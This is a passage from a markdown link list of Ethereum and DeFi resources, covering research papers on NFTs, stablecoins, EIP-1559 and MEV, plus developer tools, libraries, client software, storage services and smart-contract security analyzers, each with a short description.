how they provide feedback to the blockchain and smart contracts.\n- [CeFi vs. DeFi - Comparing Centralized to Decentralized Finance](https://arxiv.org/abs/2106.08157) - In this work, authors systematically analyze the differences between CeFi and DeFi, covering legal, economic, security, privacy and market manipulation. Authors also provide a structured methodology to differentiate between a CeFi and a DeFi service.\n\n#### Ethereum Name Service\n\n- [Ethereum Name Service: the Good, the Bad, and the Ugly](https://arxiv.org/pdf/2104.05185.pdf) - Yet, no existing work has studied this emerging system, the security issues and misbehaviors in ENS. Authors present the first study of ENS by analyzing millions of event logs related to ENS.\n\n#### Non-Fungible Token (NFT):\n\n- [Mapping the NFT revolution](https://arxiv.org/pdf/2106.00647.pdf) - Market trends, trade networks and visual features.\n- [Fairness in ERC token markets](https://arxiv.org/pdf/2102.03721.pdf) - A Case Study of CryptoKitties.\n- [Non-Fungible Token: Overview, Evaluation, Opportunities and Challenges](https://arxiv.org/pdf/2105.07447.pdf) - In this technical report, authors explore the NFT ecosystems in several aspects.\n- [Networks of Ethereum Non-Fungible Tokens: A graph-based analysis of the ERC-721 ecosystem](https://arxiv.org/pdf/2110.12545.pdf)\n- [NFT School is an open-source project from web developers: NFT Basics, First Steps Tutorial, Minting Service Tutorial](https://nftschool.dev/)\n\n#### Stable-Coins:\n\n- [Stablecoins 2.0](https://arxiv.org/pdf/2006.12388.pdf) - Authors seek to provide a sound foundation for stablecoin theory, with a risk-based functional characterization of the economic structure of stablecoins.\n- [Reducing the Volatility of Cryptocurrencies — A Survey of Stablecoins](https://arxiv.org/pdf/2103.01340.pdf) - Authors discuss how stablecoins help reduce the volatility of cryptocurrencies by surveying different types of stablecoins and their stability mechanisms.\n- [Understand Volatility of Algorithmic Stablecoin: Modeling, Verification and Empirical Analysis](https://arxiv.org/pdf/2101.08423.pdf) - Authors performed a systematic empirical analysis on real transaction activities of the Basis Cash stablecoin to relate theoretical possibilities to market observations.\n- [T-Cash: Transferable Fiat Backed Coins](https://arxiv.org/pdf/2105.04485.pdf) - In this paper authors propose a transferable electronic cash scheme using blockchain technology which allows users to continuously reuse coins within the system.\n\n#### General information:\n\n- [A Big Data Analysis of the Ethereum Network: from Blockchain to Google Trends](https://arxiv.org/pdf/2104.01764.pdf) - An analysis of the crypto prices and search trends suggests the existence of big players (and not the regular users), manipulating the market after a drop in prices.\n- [A DLT-based Smart Contract Architecture for Atomic and Scalable Trading](https://arxiv.org/pdf/2105.02937.pdf) - In this paper, authors propose an atomic, scalable and privacy-preserving protocol that enables secure and dynamic updates. Then develop a smart contract-based Credit-Note System (CNS) that allows participants to lock funds before a state channel initialisation, which enhances flexibility and efficiency.\n- [Exploring Etherum Data Stores: A Cost and Performance Comparison ](https://arxiv.org/pdf/2105.10520.pdf) -In this work, authors examine a comprehensive set of data management approaches for ETH apps and assess the associated cost in gas as well as the retrieval performance.\n- [A Systematic Literature Review on Blockchain Governance](https://arxiv.org/pdf/2105.05460.pdf) - This study comprehensively investigates blockchain governance via 5W1H questions.\n- [A general framework for blockchain analytics](https://arxiv.org/pdf/1707.01021.pdf) - Authors propose a general-purpose framework, supporting data analytics on Bitcoin Ethereum — it allows to integrate block data with data from other sources, and to organise them in a database.\n- [AMR:Autonomous Coin Mixer with Privacy Preserving Reward Distribution](https://arxiv.org/pdf/2010.01056.pdf) - In this work, authors propose the first censorship resilient mixer, which can reward its users in a privacy-preserving manner for participating in the system.\n- [Technology Review of Blockchain Data Privacy Solutions](https://arxiv.org/pdf/2105.01316.pdf)- This report aims to review existing enterprise blockchain technologies: EOSIO powered systems, Hyperledger Fabric and Besu, Consensus Quorum, R3 Corda and Ernst and Young’s Nightfall.\n- [Blockchain Systems, Technologies and Applications: A Methodology Perspective](https://arxiv.org/pdf/2105.03572.pdf) - First, this article introduces how blockchain works, the research activity and challenge, and illustrates the roadmap involving the classic methodology with typical blockchain use cases and topics. Second, in blockchain system, how to adopt stochastic process, game theory, optimization, machine learning and cryptography to study blockchain running process and design blockchain protocol/algorithm are discussed in details.\n- [Ethna: Analyzing the Underlying Peer-to-Peer Network of the Ethereum Blockchain](https://arxiv.org/pdf/2010.01373.pdf) - Ethna implements a novel method that accurately measures the degrees of Ethereum nodes.\n- [Community Detection in Blockchain Social Networks](https://arxiv.org/pdf/2101.06406.pdf) - A novel community detection algorithm which is designed for low-rank signals on graph can help find users’ communities based on user-token subscription.\n- [Block Access Control in Wireless Blockchain Network: Design, Modeling and Analysis](https://arxiv.org/pdf/2104.13144.pdf) - The results show that BAC approaches can help the network to achieve a high transaction throughput while improving block utilization and saving computational power. Meanwhile, the trade-off between transaction throughput and block utilization is demonstrated, which can act as a guidance for practical deployment of blockchain.\n- [Towards External Calls for Blockchain and Distributed Ledger Technology](https://arxiv.org/pdf/2105.10399.pdf) - In this paper authors show that this belief is preconceived by demonstrating a method that enables blockchain and distributed ledger technologies to perform calls to external systems initiated from the blockchain/DLT itself.\n- [Managing Blockchain Systems and Applications: A Process Model for Blockchain Configurations](https://arxiv.org/pdf/2105.02118.pdf) - Authors demonstrate the applicability of the proposed blockchain configuration process model on four blockchain projects\n- [A Note on Optimal Fees for Constant Function Market Makers](https://arxiv.org/pdf/2105.13510.pdf) - Authors present framework that can be used to compute optimal fees for real world pools using past trade data.\n- [Reward Mechanism for Blockchains Using Evolutionary Game Theory](https://arxiv.org/pdf/2104.05849.pdf) - In this paper, authors develop a reward mechanism framework that could apply to many PoS blockchains.\n- [Summing Up Smart Transitions](https://arxiv.org/pdf/2105.07663.pdf) - In this paper, authors present a generalization of first-order logic which can express the unbounded sum of balances.\n- [100+ Metrics for Software Startups - A Multi-Vocal Literature Review](https://arxiv.org/pdf/1901.04819.pdf) - Using data in the form of metrics can help software startups to make the right decisions amidst uncertainty and limited resources.\n- [Blockchain Networks: Data Structures of Bitcoin , Monero, Zcash, Ethereum, Ripple and IOTA](https://arxiv.org/pdf/2103.08712.pdf) - Authors discuss how blockchain data can be abstracted as various types of networks, and how network abstractions used to reap insights into the structure.\n- [Decentralized Finance: On Blockchain- and Smart Contract-Based Financial Markets](https://research.stlouisfed.org/publications/review/2021/02/05/decentralized-finance-on-blockchain-and-smart-contract-based-financial-markets) - Written by Fabian Schar, gives an overview of blockchain based markets with technical details but in a digestable format; great paper for new comers to the space.\n\n#### Special Author's compilations:\n\n- [All-about-NFT security](https://graph.org/NFT-security-01-28)\n- [All ETH security tools existing](https://graph.org/ETHSec-Tools-02-13)\n- [All good TG Dev communities](https://graph.org/Crypto-Telegram-Channels--Chats-04-19)\n- [Known smart contract-side and user-side attacks](https://graph.org/Data-02-14)\n- [Solidity A-Z](https://graph.org/Solidity-Cheatsheets-Pack-03-20)\n- [All known smart contract side and user side attacks](https://graph.org/All-known-smart-contract-side-and-user-side-attacks-and-vulnerabilities-in-Web30--DeFi-03-31)\n- [All possible transaction analysis, crypto-forensics and investigation tools list & references in a single note](https://graph.org/TX-Analysis-tools-04-19)\n- [Key principles of storing crypto cold wallet attacks defense methods best practices](https://graph.org/Key-principles-of-storing-crypto-cold-wallet-attacks-defense-methods-best-practices--Bonus-04-23)\n\n#### Side-Chains\n\n- [POA Network](https://www.poa.network/)\n- [POA Bridge](https://bridge.poa.net/)\n- [POA Bridge UI](https://github.com/poanetwork/bridge-ui)\n- [POA Bridge Contracts](https://github.com/poanetwork/poa-bridge-contracts)\n- [Loom Network](https://github.com/loomnetwork)\n- [Polygon Network](https://docs.polygon.technology/)\n\n#### EIP - 1559\n\n- [EIP1559 FAQ](https://notes.ethereum.org/@vbuterin/eip-1559-faq) - EIP1559 FAQ\n- [Dynamical Analysis of the EIP-1559 Ethereum Fee Market](https://arxiv.org/pdf/2102.10567.pdf)- Authors perform a thorough analysis of the resulting fee market dynamic mechanism via a combination of tools from game theory and dynamical systems.\n- [Stochastic Properties of EIP1559 Basefees](https://arxiv.org/pdf/2105.03521.pdf) - Authors explain the new pricing mechanism for the Ethereum developed to bring stability to fluctuating gas prices.\n- [Transaction Fee Mechanism Design for the Ethereum Blockchain: An Economic Analysis of EIP-1559](https://arxiv.org/pdf/2012.00854.pdf) - This report assesses the game-theoretic strengths and weaknesses of the proposal and explores some alternative designs.\n\n#### Ethereum 2.0\n\n- [How does the NEW Ethereum work?](https://www.preethikasireddy.com/post/how-does-the-new-ethereum-work)\n- [How does Ethereum work, anyway?](https://www.preethikasireddy.com/post/how-does-ethereum-work-anyway#Story)\n- [Serenity Design Rationale](https://notes.ethereum.org/@vbuterin/serenity_design_rationale)\n- [Specification](https://github.com/ethereum/annotated-spec)\n- [Beaconcha](https://beaconcha.in/)\n- [Beaconscan](https://beaconscan.com/)\n- [Ethereum 2.0 Stats](https://eth2stats.io/)\n- [Ethereum 2.0 Docs](https://docs.ethhub.io/ethereum-roadmap/ethereum-2.0/eth-2.0-phases/)\n- [Ethereum 2.0 Clients](https://docs.ethhub.io/ethereum-roadmap/ethereum-2.0/eth2.0-teams/teams-building-eth2.0/)\n- [Ethereum 2.0 Forks](https://eth2-fork-mon.stokes.io/)\n\n#### MEV - Maximal Extractable Value / Miner Extractable Value:\n\n- [Quantifying Blockchain Extractable Value: How dark is the forest?](https://arxiv.org/pdf/2101.05511v2.pdf) - Authors provide evidence that miners already extract Miner Extractable Value (MEV), which could destabilize the blockchain consensus security, as related work has shown.\n- [Flash Boys 2.0: Frontrunning, Transaction Reordering, and Consensus Instability in Decentralized Exchanges](https://arxiv.org/pdf/1904.05234.pdf) - Introduces the concept of MEV, the work highlights the large, complex risks created by transaction-ordering dependencies in smart contracts and the ways in which traditional forms of financial-market exploitation are adapting to and penetrating blockchain economies.\n- [Flashbots: MEV in Eth2](https://hackmd.io/@flashbots/mev-in-eth2) - In this post, authors study transaction ordering in eth2 and analyze MEV-enabled staking yields. Then they find that MEV will significantly boost validator rewards but may reinforce inequalities among participants of eth2. Authors also discuss qualitative aspects of MEV in eth2 such as the potential dynamics that will unfold between its largest stakeholders like exchanges and validator pools.\n- [A Survey on Blockchain Interoperability: Past, Present, and Future Trends](https://arxiv.org/abs/2005.14282) - In this post, authors study blockchain interoperability techniques and solutions, providing a holistic overview of blockchain interoperability, paving the way for systematic research in this domain.\n\n#### Discussion\n\n- [SmartContractResearch Forum](https://www.smartcontractresearch.org)\n- [ethresear.ch](https://ethresear.ch)\n- [ethereum-magicians.org](https://ethereum-magicians.org)\n- [speedrunethereum.com](https://speedrunethereum.com)\n- [Follow](https://t.me/s/officer_cia/760)\n\n#### Hacks in Web3\n\n- [All Resources to become a smart contract auditor](https://graph.org/All-resources-to-become-a-smart-contract-auditor-09-11)\n- [Retrospective: Hacks in Web3](https://officercia.medium.com/retrospective-hacks-in-web3-cc83b8ee0e93)\n- [Rekt News](https://rekt.eth.link/leaderboard) - Anonymous platform for whistleblowers and DeFi detectives to present their information to the community.\n- [Blockchain Threat Intelligence](https://blockthreat.substack.com/) - Newsletter covering the latest security news, tools, events, vulnerabilities, and threats in the cryptocurrency landscape. Also [supports this repo.](https://github.com/openblocksec/blocksec-incidents)\n- [Blockchain Graveyard](https://magoo.github.io/Blockchain-Graveyard/) - A list of all massive security breaches or thefts involving blockchains.\n\n# Tools Collection\n\n#### Ethereum Tools\n\n- [All ETH security tools existing](https://graph.org/ETHSec-Tools-02-13)\n- [Ethstats](https://ethstats.io)\n- [Node Stats](https://ethernodes.org)\n- [solidity-by-example.org](https:/solidity-by-example.org)\n- [EVM Networks List](https://chainid.network)\n- [BIP39 Derivation](https://iancoleman.io/bip39)\n- [Vanity Generator](https://github.com/johguse/profanity)\n- [Web Vanity Generator](https://vanity-eth.tk)\n- [Vanity Eth Generators](https://github.com/search?q=eth+vanity)\n- [FindETH](https://findeth.io)\n- [Eth Tx Decoder](https://antoncoding.github.io/eth-tx-decoder)\n- [Ethereum input data decoder](https://lab.miguelmota.com/ethereum-input-data-decoder)\n- [Ethereum Gas Charts](https://ethereumprice.org/gas)\n- [Ethereum TxPool Statistics](https://txpool.zengo.com/)\n- [Gas Prices Dashboard ](https://explore.duneanalytics.com/public/dashboards/qswVMdzbyiiZFdnCDSwx1jfYLOjdaokM4CSGNxsH)\n- [The UI from ABI](https://ethcontract.watch)\n- [Oracles Club](https://oracles.club)\n- [Tx Combo](https://furucombo.app)\n- [ETH or ERC-20 Mass-sender](https://disperse.app)\n- [BulkSender](https://bulksender.app)\n- [ERC20 Meta Token Wrapper](https://github.com/arcadeum/erc20-meta-token)\n- [Cancel Ethereum Transaction](https://github.com/mds1/Cancel-Ethereum-Transactions)\n- [Fees WTF Calculator](https://fees.wtf)\n- [Spend Gas Stats](https://txn.finance)\n- [Pools Stats](https://pools.fyi)\n- [Solhint](https://github.com/protofire/solhint)\n- [Solium](https://github.com/duaraghav8/Solium)\n- [Sol-tester](https://github.com/androlo/sol-tester)\n- [Solidity-coverage](https://github.com/sc-forks/solidity-coverage)\n- [TypeChain](https://github.com/ethereum-ts/TypeChain)\n- [Tenderly](https://tenderly.co/)\n- [Contract Library](https://library.dedaub.com/)\n\n#### Libraries\n\n- [dapp-bin](https://github.com/ethereum/dapp-bin) - Ethereum repo providing implementations for many common data structures and utilities in Solidity, Serpent and LLL.\n- [Solidity Collections](https://github.com/ethereum/wiki/wiki/Solidity-Collections) - Collections of code snippets and utility libraries.\n- [OpenZeppelin](https://openzeppelin.org/) - Framework to build secure smart contracts.\n\n#### Ideas\n\n- [Open DeFi Problems](https://mirror.xyz/0xemperor.eth/0guEj0CYt5V8J5AKur2_UNKyOhONr1QJaG4NGDF0YoQ)\n- [What to build?](https://github.com/0xngmi/ideas)\n- [Startup ideas](https://alliancedao.notion.site/Crypto-Web3-Startup-Ideas-2023-Edition-48d40ccadeeb42a48056659fcce109b1)\n- [polymarket.com](https://polymarket.com)\n- [How to use PolyMarket](https://medium.com/coinmonks/how-to-use-polymarket-9ee1577fd671)\n- [Ideas Lists](https://sovs.notion.site/Education-00cadae763ea4d30ae8149041718fd7a)\n- [hummingbot.org](https://hummingbot.org/)\n- [t.me/soliditypedia](https://t.me/soliditypedia)\n- [My Blog!](https://officercia.mirror.xyz/Uc1sf64yUCb0uo1DxR_nuif5EmMPs-RAshDyoAGEZZY)\n\n#### Popular Smart Contract Libraries\n\n- [Zeppelin](https://github.com/OpenZeppelin/openzeppelin-contracts) - Contains tested reusable smart contracts like SafeMath and OpenZeppelin SDK [library](https://github.com/OpenZeppelin/openzeppelin-sdk) for smart contract upgradeability\n- [cryptofin-solidity](https://github.com/cryptofinlabs/cryptofin-solidity) - A collection of Solidity libraries for building secure and gas-efficient smart contracts on Ethereum.\n- [Modular Libraries](https://github.com/Modular-Network/ethereum-libraries) - A group of packages built for use on blockchains utilising the Ethereum Virtual Machine\n- [DateTime Library](https://github.com/bokkypoobah/BokkyPooBahsDateTimeLibrary) - A gas-efficient Solidity date and time library\n- [ARC](https://github.com/daostack/arc) - an operating system for DAOs and the base layer of the DAO stack.\n- [0x](https://github.com/0xProject) - DEX protocol\n- [Token Libraries with Proofs](https://github.com/sec-bit/tokenlibs-with-proofs) - Contains correctness proofs of token contracts wrt. given specifications and high-level properties\n- [Provable API](https://github.com/provable-things/ethereum-api) - Provides contracts for using the Provable service, allowing for off-chain actions, data-fetching, and computation\n- [ABDK Libraries for Solidity](https://github.com/abdk-consulting/abdk-libraries-solidity) - Fixed-point (64.64 bit) and IEEE-754 compliant quad precision (128 bit) floating-point math libraries for Solidity\n\n#### Patterns for Smart Contracts\n\n- [Dappsys: Safe, simple, and flexible Ethereum contract building blocks](https://github.com/dapphub/dappsys)\n- [MakerDAO](https://github.com/makerdao/maker-otc)\n- [The TAO](https://github.com/ryepdx/the-tao)\n- [Dapp-a-day 1-10](https://steemit.com/@nikolai)\n- [Dapp-a-day 11-25](https://steemit.com/@nexusdev)\n- [OpenZeppelin Contracts: An open framework of reusable and secure smart contracts in the Solidity language.](https://github.com/OpenZeppelin/openzeppelin-contracts)\n- [Blog about Best Practices with Security Audits](https://blog.openzeppelin.com/)\n- [Advanced Workshop with Assembly](https://github.com/androlo/solidity-workshop)\n- [Simpler Ethereum Multisig](https://medium.com/@ChrisLundkvist/exploring-simpler-ethereum-multisig-contracts-b71020c19037) - especially section _Benefits_\n- [CryptoFin Solidity Auditing Checklist](https://github.com/cryptofinlabs/audit-checklist) - A checklist of common findings, and issues to watch out for when auditing a contract for a mainnet launch.\n- [aragonOS: A smart contract framework for building DAOs, Dapps and protocols](https://hack.aragon.org/docs/aragonos-intro.html)\n- [Checks Effects Interactions Pattern](https://fravoll.github.io/solidity-patterns/checks_effects_interactions.html)\n\n#### Upgradeability\n\n- [Blog von Elena Dimitrova, Dev at colony.io](https://blog.colony.io/author/elena/)\n- [Library driven development](https://blog.aragon.org/library-driven-development-in-solidity-2bebcaf88736)\n- [Advanced Solidity code deployment techniques](https://blog.aragon.org/advanced-solidity-code-deployment-techniques-dc032665f434/)\n- [OpenZeppelin on Proxy Libraries](https://blog.openzeppelin.com/proxy-libraries-in-solidity-79fbe4b970fd/)\n\n#### Developer Tools\n\n- [Check out our blog!](https://blog.pessimistic.io/)\n- [CryptoFin Solidity Auditing Checklist](https://github.com/cryptofinlabs/audit-checklist) - A checklist of common findings, and issues to watch out for when auditing a contract for a mainnet launch.\n- [MythX](https://mythx.io/) - Security verification platform and tools ecosystem for Ethereum developers\n- [Mythril](https://github.com/ConsenSys/mythril) - Open-source EVM bytecode security analysis tool\n- [Oyente](https://github.com/melonproject/oyente) - Alternative static smart contract security analysis\n- [Securify](https://securify.chainsecurity.com/) - Security scanner for Ethereum smart contracts\n- [SmartCheck](https://tool.smartdec.net/) - Static smart contract security analyzer\n- [Ethersplay](https://github.com/crytic/ethersplay) - EVM disassembler\n- [Evmdis](https://github.com/Arachnid/evmdis) - Alternative EVM disassembler\n- [Hydra](https://github.com/IC3Hydra/Hydra) - Framework for cryptoeconomic contract security, decentralised security bounties\n- [Solgraph](https://github.com/raineorshine/solgraph) - Visualise Solidity control flow for smart contract security analysis\n- [Manticore](https://github.com/trailofbits/manticore) - Symbolic execution tool on Smart Contracts and Binaries\n- [Slither](https://github.com/crytic/slither) - A Solidity static analysis framework\n- [Adelaide](https://github.com/sec-bit/adelaide) - The SECBIT static analysis extension to Solidity compiler\n- [solc-verify](https://github.com/SRI-CSL/solidity/) - A modular verifier for Solidity smart contracts\n- [Solidity security blog](https://github.com/sigp/solidity-security-blog) - Comprehensive list of known attack vectors and common anti-patterns\n- [Awesome Buggy ERC20 Tokens](https://github.com/sec-bit/awesome-buggy-erc20-tokens) - A Collection of Vulnerabilities in ERC20 Smart Contracts With Tokens Affected\n- [Free Smart Contract Security Audit](https://callisto.network/smart-contract-audit/) - Free smart contract security audits from Callisto Network\n- [Piet](https://piet.slock.it) - A visual Solidity architecture analyzer\n- [Contract Library](https://library.dedaub.com) - Decompiler and vulnerability scanner for deployed contracts\n\n#### Frontend Ethereum APIs\n\n- [Web3.js](https://github.com/ethereum/web3.js/) - Javascript Web3\n- [Eth.js](https://github.com/ethjs) - Javascript Web3 alternative\n- [Ethers.js](https://github.com/ethers-io/ethers.js/) - Javascript Web3 alternative, useful utilities and wallet features\n- [light.js](https://github.com/paritytech/js-libs/tree/master/packages/light.js) A high-level reactive JS library optimized for light clients.\n- [Web3Wrapper](https://github.com/0xProject/0x-monorepo/tree/development/packages/web3-wrapper) - Typescript Web3 alternative\n- [Ethereumjs](https://github.com/ethereumjs/) - A collection of utility functions for Ethereum like [ethereumjs-util](https://github.com/ethereumjs/ethereumjs-util) and [ethereumjs-tx](https://github.com/ethereumjs/ethereumjs-tx)\n- [Alchemy](https://docs.alchemy.com/docs)\n- [flex-contract](https://github.com/merklejerk/flex-contract) and [flex-ether](https://github.com/merklejerk/flex-ether) - Modern, zero-configuration, high-level libraries for interacting with smart contracts and making transactions.\n- [ez-ens](https://github.com/merklejerk/ez-ens) - Simple, zero-configuration Ethereum Name Service address resolver.\n- [web3x](https://github.com/xf00f/web3x) - A TypeScript port of web3.js. Benefits includes tiny builds and full type safety, including when interacting with contracts.\n- [Nethereum](https://github.com/Nethereum/) - Cross-platform Ethereum development framework\n- [dfuse](https://github.com/dfuse-io/client-js) - A TypeScript library to use [dfuse Ethereum API](https://dfuse.io)\n- [Drizzle](https://github.com/truffle-box/drizzle-box) - Redux library to connect a frontend to a blockchain\n- [Tasit SDK](https://github.com/tasitlabs/tasitsdk) - A JavaScript SDK for making native mobile Ethereum dapps using React Native\n- [useMetamask](https://github.com/mdtanrikulu/use-metamask) - a custom React Hook to manage Metamask in Ethereum ĐApp projects\n- [WalletConnect](https://walletconnect.org/) - Open protocol for connecting Wallets to Dapps\n- Strictly Typed - Javascript alternatives\n- [elm-ethereum](https://github.com/cmditch/elm-ethereum)\n- [purescript-web3](https://github.com/f-o-a-m/purescript-web3)\n- [ChainAbstractionLayer](https://github.com/liquality/chainabstractionlayer) - Communicate with different blockchains (including Ethereum) using a single interface.\n- [Delphereum](https://github.com/svanas/delphereum) - a Delphi interface to the Ethereum blockchain that allows for development of native dApps for Windows, macOS, iOS, and Android.\n- [Torus](https://tor.us/) - Open-sourced SDK to build dapps with a seamless onboarding UX\n- [Fortmatic](https://fortmatic.com/) - A simple to use SDK to build web3 dApps without extensions or downloads.\n- [Portis](https://portis.io/) - A non-custodial wallet with an SDK that enables easy interaction with DApps without installing anything.\n- [create-eth-app](https://github.com/paulrberg/create-eth-app) - Create Ethereum-powered front-end apps with one command.\n- [Scaffold-ETH](https://github.com/austintgriffith/scaffold-eth) - Beginner friendly forkable github for getting started building smart contracts.\n- [Jolly Roger](https://jolly-roger.eth.link/) - dApp framework using ethereum, buidler, svelte and thegraph\n- [Notify.js](https://blocknative.com/notify) - Deliver real-time notifications to your users. With built-in support for Speed-Ups and Cancels, Blocknative Notify.js helps users transact with confidence. Notify.js is easy to integrate and quick to customize.\n\n#### Backend Ethereum APIs\n\n- [Web3.py](https://github.com/ethereum/web3.py) - Python Web3\n- [Web3.php](https://github.com/sc0Vu/web3.php) - PHP Web3\n- [Ethereum-php](https://github.com/digitaldonkey/ethereum-php) - PHP Web3\n- [Web3j](https://github.com/web3j/web3j) - Java Web3\n- [Nethereum](https://nethereum.com/) - .Net Web3\n- [Ethereum.rb](https://github.com/EthWorks/ethereum.rb) - Ruby Web3\n- [rust-web3](https://github.com/tomusdrw/rust-web3) - Rust Web3\n- [ethers-rs](https://github.com/gakonst/ethers-rs/) - Ethers-rs\n- [Web3.hs](https://hackage.haskell.org/package/web3) - Haskell Web3\n- [KEthereum](https://github.com/komputing/KEthereum) - Kotlin Web3\n- [Eventeum](https://github.com/ConsenSys/eventeum) - A bridge between Ethereum smart contract events and backend microservices, written in Java by Kauri\n- [Ethereumex](https://github.com/mana-ethereum/ethereumex) - Elixir JSON-RPC client for the Ethereum blockchain\n- [Ethereum-jsonrpc-gateway](https://github.com/HydroProtocol/ethereum-jsonrpc-gateway) - A gateway that allows you to run multiple Ethereum nodes for redundancy and load-balancing purposes. Can be ran as an alternative to (or on top of) Infura. Written in Golang.\n- [EthContract](https://github.com/AgileAlpha/eth_contract) - A set of helper methods to help query ETH smart contracts in Elixir\n- [Ethereum Contract Service](https://github.com/mesg-foundation/service-ethereum-contract) - A MESG Service to interact with any Ethereum contract based on its address and ABI.\n- [Ethereum Service](https://github.com/mesg-foundation/service-ethereum) - A MESG Service to interact with events from Ethereum and interact with it.\n- [Marmo](https://marmo.io/) - Python, JS, and Java SDK for simplifying interactions with Ethereum. Uses relayers to offload transaction costs to relayers.\n- [Ethereum Logging Framework](https://bitbucket.csiro.au/users/kli039/repos/ethereum-logging-framework/browse) - provides advanced logging capabilities for Ethereum applications and networks including a query language, query processor, and logging code generation\n\n#### Ethereum Clients\n\n- [Besu](https://besu.hyperledger.org/en/latest/) - an open-source Ethereum client developed under the Apache 2.0 license and written in Java. The project is hosted by Hyperledger.\n- [Geth](https://geth.ethereum.org/docs/) - Go client\n- [Erigon](https://github.com/ledgerwatch/erigon) - a mostly Go implementation of Ethereum client built on the efficiency frontier\n- [Akula](https://github.com/akula-bft/akula) - Rust implementation\n- [Nethermind](https://github.com/NethermindEth/nethermind) - .NET Core client\n- [Infura](https://infura.io/) - A managed service providing Ethereum client standards-compliant APIs\n- [Trinity](https://trinity.ethereum.org/) - Python client using [py-evm](https://github.com/ethereum/py-evm)\n- [Ethereumjs](https://github.com/ethereumjs/ethereumjs-client) - JS client using [ethereumjs-vm](https://github.com/ethereumjs/ethereumjs-vm)\n- [Seth](https://github.com/dapphub/dapptools/tree/master/src/seth) - Seth is an Ethereum client tool—like a ""MetaMask for the command line""\n- [Quorum](https://github.com/jpmorganchase/quorum) - A permissioned implementation of Ethereum supporting data privacy by [JP Morgan](https://jpmorgan.com/quorum)\n- [Awesome Quorum](https://github.com/ConsenSys/awesome-quorum) - A curated list of awesome softwares, libraries, tools and more to build on ConsenSys Quorum.\n- [Chainstack](https://chainstack.com/) - A managed service providing shared and dedicated Geth nodes\n- [QuikNode](https://quiknode.io/) - Blockchain developer cloud with API access and node-as-a-service.\n- [Watchdata](https://watchdata.io) - Provide simple and reliable API access to Ethereum blockchain\n\n#### Storage\n\n- [DB3 Network](https://github.com/dbpunk-labs/db3) - Decentralized Firebase Firestore Alternative.\n- [IPFS](https://ipfs.io/) - Decentralised storage and file referencing\n- [Mahuta](https://github.com/ConsenSys/Mahuta) - IPFS Storage service with added search capability, formerly IPFS-Store\n- [OrbitDB](https://github.com/orbitdb/orbit-db) - Decentralised database on top of IPFS\n- [JS IPFS API](https://github.com/ipfs/js-ipfs-http-client) - A client library for the IPFS HTTP API, implemented in JavaScript\n- [TEMPORAL](https://github.com/RTradeLtd/Temporal) - Easy to use API into IPFS and other distributed/decentralised storage protocols\n- [PINATA](https://pinata.cloud) - The Easiest Way to Use IPFS\n- [Swarm](https://swarm-gateways.net/) - Distributed storage platform and content distribution service, a native base layer service of the Ethereum web3 stack\n- [Infura](https://infura.io/) - A managed IPFS API Gateway and pinning service\n- [Aleph.im](https://aleph.im/) - an offchain incentivized peer-to-peer cloud project (database, file storage, computing and DID) compatible with ETH and IPFS.\n- [Fleek](https://fleek.co/) - similar to netlify but uses ipfs for hosting websites.\n\n#### Bootstrap/Out-of-Box tools\n\n- [Truffle boxes](https://trufflesuite.com/boxes) - Packaged components for the Ethereum ecosystem\n- [Create Eth App](https://github.com/paulrberg/create-eth-app) - Create Ethereum-powered frontend apps with one command\n- [Besu Private Network](https://besu.hyperledger.org/en/stable/Tutorials/Quickstarts/Azure-Private-Network-Quickstart/) - Run a private network of Besu nodes in a Docker container\n- [Testchains](https://github.com/Nethereum/TestChains) - Pre-configured .NET devchains for fast response (PoA)\n- [Blazor/Blockchain Explorer](https://github.com/Nethereum/NethereumBlazor) - Wasm blockchain explorer (functional sample)\n- [Local Raiden](https://github.com/ConsenSys/Local-Raiden) - Run a local Raiden network in docker containers for demo and testing purposes\n- [Private networks deployment scripts](https://github.com/ConsenSys/private-networks-deployment-scripts) - Out-of-the-box deployment scripts for private PoA networks\n- [Local Ethereum Network](https://github.com/ConsenSys/local_ethereum_network) - Out-of-the-box deployment scripts for private PoW networks\n- [Kaleido](https://kaleido.io/) - Use Kaleido for spinning up a consortium blockchain network. Great for PoCs and testing\n- [Cheshire](https://github.com/endless-nameless-inc/cheshire) - A local sandbox implementation of the CryptoKitties API and smart contracts, available as a Truffle Box\n- [aragonCLI](https://github.com/aragon/aragon-cli) - aragonCLI is used to create and develop Aragon apps and organizations.\n- [ColonyJS](https://github.com/JoinColony/colonyJS) - JavaScript client that provides an API for interacting with the Colony Network smart contracts.\n- [ArcJS](https://github.com/daostack/arc.js) - Library that facilitates javascript application access to the DAOstack Arc ethereum smart contracts.\n- [Onboard.js](https://blocknative.com/onboard) - Blocknative Onboard is the quick and easy way to add multi-wallet support to your project. With built-in modules for more than 20 unique hardware and software wallets, Onboard saves you time and headaches.\n- [web3-react](https://github.com/NoahZinsmeister/web3-react) - React framework for building single-page Ethereum dApps\n\n#### Ethereum ABI (Application Binary Interface) tools\n\n- [ABI decoder](https://github.com/ConsenSys/abi-decoder) - library for decoding data params and events from Ethereum transactions\n- [ABI-gen](https://github.com/0xProject/0x-monorepo/tree/development/packages/abi-gen) - Generate Typescript contract wrappers from contract ABI's.\n- [Ethereum ABI UI](https://github.com/hiddentao/ethereum-abi-ui) - Auto-generate UI form field definitions and associated validators from an Ethereum contract ABI\n- [headlong](https://github.com/esaulpaugh/headlong/) - type-safe Contract ABI and Recursive Length Prefix library in Java\n- [EasyDapper](https://www.easydapper.com) - Generate dapps from Truffle artifacts, deploy contracts on public/private networks, offers live customizable public page to interact with contracts.\n- [One Click dApp](https://oneclickdapp.com) - Instantly create a dApp at a unique URL using the ABI.\n- [Truffle Pig](https://npmjs.com/package/trufflepig) - a development tool that provides a simple HTTP API to find and read from Truffle-generated contract files, for use during local development. Serves fresh contract ABIs over http.\n- [Ethereum Contract Service](https://github.com/mesg-foundation/service-ethereum-contract) - A MESG Service to interact with any Ethereum contract based on its address and ABI.\n- [Nethereum-CodeGenerator](https://github.com/StefH/Nethereum-CodeGenerator) - A web based generator which creates a Nethereum based C# Interface and Service based on Solidity Smart Contracts.\n\n# Testing Tools\n\n- [Solidity code coverage](https://github.com/0xProject/0x-monorepo/tree/development/packages/sol-coverage) - Solidity code coverage tool\n- [Solidity coverage](https://github.com/sc-forks/solidity-coverage) - Alternative code coverage for Solidity smart-contracts\n- [Solidity function profiler](https://github.com/EricR/sol-function-profiler) - Solidity contract function profiler\n- [Sol-profiler](https://github.com/Aniket-Engg/sol-profiler) - Alternative and updated Solidity smart contract profiler\n- [Espresso](https://github.com/hillstreetlabs/espresso) - Speedy, parallelised, hot-reloading solidity test framework\n- [Eth tester](https://github.com/ethereum/eth-tester) - Tool suite for testing Ethereum applications\n- 